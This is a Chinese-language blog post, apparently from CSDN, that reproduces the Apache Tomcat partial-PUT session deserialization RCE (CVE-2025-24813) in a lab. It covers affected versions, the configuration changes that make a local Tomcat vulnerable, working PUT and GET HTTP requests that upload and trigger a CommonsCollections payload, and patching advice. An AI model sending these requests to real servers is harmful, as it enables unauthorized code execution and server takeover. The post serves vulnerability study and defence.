Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)

最新推荐文章于 2025-07-21 14:30:02 发布
最新推荐文章于 2025-07-21 14:30:02 发布
阅读量1.1k 收藏 15
点赞数 12
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 网络安全 tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNwblxiao/article/details/146304036

影响范围:

11.0.0-M1 <= Apache Tomcat <= 11.0.2

10.1.0-M1 <= Apache Tomcat <= 10.1.34

9.0.0.M1 <= Apache Tomcat <= 9.0.98

漏洞描述:

当应用程序启用DеfаultSеrvlеt写入功能(默认情况下禁用)、使用 Tоmсаt默认会话持久机制和存储位置、依赖库存在反序列化利用链时,未授权攻击者能够执行恶意代码获取服务器权限。

利用条件:

启用DеfаultSеrvlеt写入功能(默认情况下禁用)

服务器启用了partial PUT请求(默认启用)

使用Tomcat默认会话持久机制和存储位置(非默认配置,需手动设置)

依赖库存在反序列化利用链(如Commons-Collections 3.2.1)。

漏洞原理:

Content-Range 在 Tomcat 的HTTP PUT请求中主要用于实现大文件的分块传输。在文件上传未完成的情况下,内容会被临时存储在Tomcat的工作目录:$CATALINA_BASE/work/Catalina/localhost/ROOT。

该漏洞的核心在于不完整PUT请求上传时的文件名处理机制:文件路径中的分隔符/会被转换为.。例如:访问/xxxxx/session会被解析为.xxxxx.session

因此整个漏洞的利用过程为:

1、Tomcat的File会话存储默认路径同样位于:CATALINA_BASE/work/Catalina/localhost/ROOT

2、当存在反序列化利用链时,可以上传包含恶意序列化数据的文件

3、通过设置JSESSIONID=.xxxxx来触发漏洞

复现步骤:

环境配置:

Windows漏洞环境下载

https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98-windows-x64.zip

其他版本自行选择

https://tomcat.apache.org/

https://archive.apache.org/dist/tomcat/tomcat-9/

在下载解压后的tomcat目录下,找到/conf/context.xml文件进行添加配置,开启File文件会话存储

<Manager className="org.apache.catalina.session.PersistentManager">  
    <Store className="org.apache.catalina.session.FileStore"/>  
</Manager>

在这里插入图片描述

找到/conf/web.xml,将DefaultServlet的readonly配置为false,启用写入功能

<init-param>
  <param-name>readonly</param-name>
  <param-value>false</param-value>
</init-param>

在这里插入图片描述

利用需要反序列化链,下载commons-collections-3.2.1,并将commons-collections-3.2.1.jar文件复制到\apache-tomcat-9.0.98\lib目录下

https://archive.apache.org/dist/commons/collections/binaries/

https://archive.apache.org/dist/commons/collections/binaries/commons-collections-3.2.1-bin.zip

在这里插入图片描述

Windows启动tomcat

在这里插入图片描述

访问8080端口

在这里插入图片描述

复现:

使用yakit的Yso-Java-Hack快速生成一个恶意的序列化文件

在这里插入图片描述

利用链选择CommonsCollectionsK1/RuntimeExec

在这里插入图片描述

使用POC将生成的base64数据上传,需要注意Range的分块值需要与Length保持一致,且大于当前文件的长度。

POC:

PUT /xxxxx/session HTTP/1.1  
Host: 127.0.0.1:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{base64dec(反序列化文件内容)}}

在这里插入图片描述

在\apache-tomcat-9.0.98\work\Catalina\localhost\ROOT目录下可以看到,已经将数据上传成功

在这里插入图片描述

再使用如下POC触发(该session文件是临时文件有时间的,时间到了也会自动触发)

GET / HTTP/1.1  
Host: 127.0.0.1:8080  
Cookie: JSESSIONID=.xxxxx

在这里插入图片描述

修复措施建议:

1、升级版本

升级到 Apache Tomcat 11.0.3 或更高版本

升级到 Apache Tomcat 10.1.35 或更高版本

升级到 Apache Tomcat 9.0.99 或更高版本

2、禁止partial PUT:在conf/web.xml中修改allowPartialPut参数为false,并重启Tomcat以使配置生效

3、严格控制DefaultServlet写入权限:确保readOnly=true,禁用所有未经授权的PUT/DELETE请求,仅允许可信来源访问受限目录

4、检查应用程序依赖库

漏洞公告:

https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq

参考链接:

https://forum.butian.net/article/674

漏洞修复:Apache Tomcat 安全漏洞(CVE-2024-50379) | Apache Tomcat 安全漏洞(CVE-2024-52318)
专注于计算机研发知识和资讯分享
01-23 1969
解决方案:升级到最新版Tomcat
Apache Tomcat 远程代码执行漏洞复现(CVE-2025-24813)(附脚本)
iSee857的博客
03-13 3653
漏洞源于 Tomcat DefaultServlet 处理 partial PUT 请求(基于 `Content-Range` 头的 HTTP PUT 请求)时的 临时文件命名逻辑不安全,导致攻击者可以通过构造特殊的请求路径,访问或写入安全敏感文件。(CVE-2025-24813
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
热门推荐
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 1万+
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
CVE-2025-24813Apache Tomcat 远程代码执行漏洞分析
lytaaaa的博客
05-14 1324
Apache Tomcat 是一款开源的轻量级 Web 应用服务器和 Servlet 容器,由 Apache 软件基金会 Jakarta 项目开发,现已成为最主流的 Java Web 服务器之一。然而,其默认配置存在路径等价性漏洞:'file.Name'(包含内部点)可能导致远程代码执行、信息泄露,或通过可写默认 Servlet 上传恶意文件。攻击者可利用此漏洞将恶意文件上传至目标系统,进而实现远程代码执行、恶意软件传播、敏感信息窃取,甚至完全控制系统。
漏洞复现】Apache Tomcat 远程代码执行CVE-2025-24813
李火火的安全圈
03-28 665
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
syg6921008的博客
04-06 4493
Apache Tomcat 中一个关键的路径等效性(Path Equivalence)漏洞,允许未经身份验证的远程攻击者在特定配置下实现远程代码执行(RCE)、读取敏感文件,甚至篡改文件内容。该漏洞已在野外被观察到存在实际利用行为,影响范围广泛。CVE-2025-24813 是一次典型的“路径+反序列化+配置缺陷”复合型漏洞,表面上源于文件路径处理缺陷,实际利用则依赖于多个错误配置的叠加效应。边界可信假设失效、中间件权限设置失误、反序列化引擎暴露等老问题,在现代系统中依旧构成致命威胁。
Apache Tomcat RCE漏洞复现(CVE-2025-24813
weixin_55010563的博客
03-15 1084
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。尝试使用 Tomcat 9.0.98 版本复现:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip。
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
m0_46699477的博客
03-12 2296
Apache Tomcat 是一个开源的 Java Servlet 容器,广泛用于运行基于 Java 的 Web 应用程序。该漏洞CVE-2025-24813)允许远程攻击者通过特定的恶意请求在目标系统上执行任意命令,从而完全控制受影响的服务器。 满足以下条件,攻击者可以远程代码执行(RCE): 1. DefaultServlet 启用了写入权限(默认情况下禁用)。 2. 服务器启用了partial PUT(默认启用)。 3. Tomcat 使用了基于文件的 Session 持久化机制(非默认配置,默认为
漏洞分析 | Apache Tomcat远程代码执行漏洞CVE-2025-24813
WangsuSecurity的博客
04-25 734
目前该漏洞POC状态已在互联网公开,建议尽快做好自查及防护
图片服务器
whinsist的专栏
07-05 312
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
Apache Tomcat 远程代码执行漏洞CVE-2024-50379处置建议和缓解措施
拉丁解牛技术专栏
01-22 388
近期,Apache官方修复了Apache Tomcat 远程代码执行漏洞(CVE-2024-50379), 该漏洞是由于Tomcat在验证文件路径时存在缺陷,如果readonly参数被设置为false(这是一个非标准配置),并且服务器允许通过PUT方法上传文件,那么攻击者就可以上传含有恶意JSP代码的文件。通过不断地发送请求,攻击者可以利用条件竞争,使得Tomcat解析并执行这些恶意文件,从而实现远程代码执行Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 7319
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
Apache Tomcat CVE-2025-24813 安全漏洞
zhao_kang_cheng的专栏
03-21 1017
为了获得真实证据,我们可以使用开源github来搜索具有此配置的存储库。根据结果,只有少数在 GitHub 上公开发布的开源 Tomcat 项目使用此配置(大约 200 个),并且大多数都有。现在我们可以将 .session 文件(一个序列化的 Java 对象)写入根目录。提供静态资源的默认 servlet 必须处于非默认的“readonly=false”配置中。文件以启用基于文件的会话持久性,根据tomcat指出,这是实例易受攻击的必要条件。我们的该脚本的测试副本如下。2.漏洞必须依赖在服务器中的配置。
CVE-2025-24813 Tomcat 反序列化漏洞源码深度解析分析(下篇)
最新发布
我是一名专注于网络安全领域的技术研究者,长期从事渗透测试、漏洞挖掘、安全审计与攻防对抗相关工作。热衷于探索真实世界中的安全问题,致力于通过技术手段识别与解决系统潜在风险。
07-21 893
本文并非简单复现 CVE-2025-24813,区别于市面上多数仅停留在 POC 运行的文章。基于 Tomcat 源码,通过深入分析调用链与反序列化机制,全面还原漏洞的触发原理与底层实现。适合希望真正理解漏洞本质和内在机制的安全研究者阅读。
Apache Tomcat文件包含漏洞复现(详细教程)
weixin_60838266的博客
07-18 4648
TomcatApache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
Tomcat Session 反序列化漏洞CVE-2025-24813
玄道的网安博客
03-14 1552
核心逻辑在这里,以 range.length作为文件的长度,range.start作为起始点开始处理流,这也是为什么 length 必须要大于 body 的总长度,不然无法将内容完全上传。这部分是反序列化触发点,CVE-2020-9484出自这里,所以不难看出这其实是一个组合漏洞,当时CVE-2020-9484是因为存在目录穿越问题所以可以穿越加载一个自定义的序列化文件。CVE-2017-12615、CVE-2024-50379均涉及该方法,也就是 doPUT,其实逻辑很简单,如以下代码
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)复现
weixin_74338418的博客
04-23 1020
一、漏洞概述远程代码执行漏洞(CVE-2025-24813)源于Apache Tomcat的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。二、影响版本Tomcat 11.0.0-M1 至 11.0.2Tomcat 10.1.0-M1 至 10.1.34。
漏洞复现】Apache Tomcat 远程代码执行 CVE-2025-24813(附CyberStrikeLab 靶场 PT-19 WriteUp)
仇辉攻防的博客
03-15 1978
漏洞复现。
Apache Tomcat远程代码执行漏洞CVE-2025-24813)复现
03-25
### Apache Tomcat CVE-2025-24813 远程代码执行漏洞复现 #### 漏洞概述 Apache Tomcat远程代码执行漏洞 (CVE-2025-24813) 存在于特定版本中,当满足某些条件时,攻击者可以利用该漏洞实现未授权的恶意代码执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值